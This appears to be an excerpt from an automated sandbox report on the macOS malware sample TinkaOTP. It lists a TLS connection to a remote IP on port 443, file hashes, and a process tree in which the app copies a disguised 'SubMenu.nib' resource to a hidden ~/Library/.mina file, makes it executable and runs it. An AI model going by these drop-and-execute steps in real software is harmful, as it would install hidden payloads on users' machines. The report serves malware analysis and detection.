      May 6, 2020 15:17:51.270240068 CEST185.62.58.207443192.168.0.5149379CN=bvwaewachdyzpb.org, OU=JPO Co. Ltd, O=VRZ Co. Ltd, L=St. Clair, ST=Manitowoc, C=USCN=bvwaewachdyzpb.org, OU=JPO Co. Ltd, O=VRZ Co. Ltd, L=St. Clair, ST=Manitowoc, C=USSat Mar 21 00:48:59 CET 2020Tue Mar 19 00:48:59 CET 2030771,49196-49195-49200-49199-159-158-52393-52392-52394-49191-49187-49192-49188-49162-49161-49172-49171-107-103-57-51-52244-52243-52245,13-11-10-23,25-24-23-21-19-16,0f8c52bdcd6feb46ef8a6d31d73ab457f

      System Behavior

      General

      Start time:15:16:23
      Start date:06/05/2020
      Path:/usr/libexec/xpcproxy
      Arguments:n/a
      File size:44048 bytes
      MD5 hash:4782e7ebd2985d32bc84f1f71c8f8fb7

      General

      Start time:15:16:23
      Start date:06/05/2020
      Path:/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
      Arguments:/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
      File size:716832 bytes
      MD5 hash:02670c82d74d0362a5fafdf3f42904ef

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/bin/bash
      Arguments:n/a
      File size:618416 bytes
      MD5 hash:0313fd399b143fc40cd52a1679018305

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/bin/bash
      Arguments:n/a
      File size:618416 bytes
      MD5 hash:0313fd399b143fc40cd52a1679018305

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/bin/cp
      Arguments:cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/ben/Library/.mina
      File size:29024 bytes
      MD5 hash:b78b44666e242cb82db43e70116add92

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/bin/bash
      Arguments:n/a
      File size:618416 bytes
      MD5 hash:0313fd399b143fc40cd52a1679018305

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/bin/chmod
      Arguments:chmod +x /Users/ben/Library/.mina
      File size:30016 bytes
      MD5 hash:d7df83ea3a49de5d07e0c1730e910852

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/bin/bash
      Arguments:n/a
      File size:618416 bytes
      MD5 hash:0313fd399b143fc40cd52a1679018305

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/Users/ben/Library/.mina
      Arguments:/Users/ben/Library/.mina
      File size:673092 bytes
      MD5 hash:f05437d510287448325bac98a1378de1

      General

      Start time:15:16:24
      Start date:06/05/2020
      Path:/Users/ben/Library/.mina
      Arguments:n/a
      File size:673092 bytes
      MD5 hash:f05437d510287448325bac98a1378de1